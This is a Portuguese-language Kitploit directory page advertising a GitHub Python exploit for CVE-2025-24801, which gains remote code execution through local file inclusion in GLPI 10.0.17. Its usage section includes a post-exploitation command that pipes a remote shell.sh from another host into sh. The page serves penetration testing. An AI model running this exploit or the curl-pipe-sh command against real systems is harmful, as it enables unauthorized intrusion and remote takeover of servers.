Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/r1beirin/exploit-cve-2025-24801
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubr1beirin/exploit-cve-2025-24801

Exploit-CVE-2025-24801

Exploit em Python para CVE-2025-24801 que alcança Execução Remota de Código via Inclusão de Arquivo Local no GLPI 10.0.17. Inclui modo de execução de comandos para pós-exploração.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 1 anoAinda não revisado
Compartilhar

CVE-2025-24801

Este exploit usa CVE-2025-24801 para obter Execução Remota de Código (RCE) através de Inclusão Local de Arquivos (LFI) no GLPI 10.0.17. Prova de Conceito (PoC) desta CVE com explicação sobre esta vulnerabilidade no GLPI.

Observação

Algumas aplicações expõem o endpoint /glpi/ (ex.: http://172.16.11.130:8080/glpi/front/computer.form.php). Se a aplicação alvo incluir este endpoint, é necessário adicioná-lo ao parâmetro --url (ex.: --url http://172.16.11.130:8080/glpi).

Uso

Exemplo de uso.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password

Se você já executou este exploit e acionou RCE, você pode usar o parâmetro --cmd para executar apenas o comando.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
Baixar ferramenta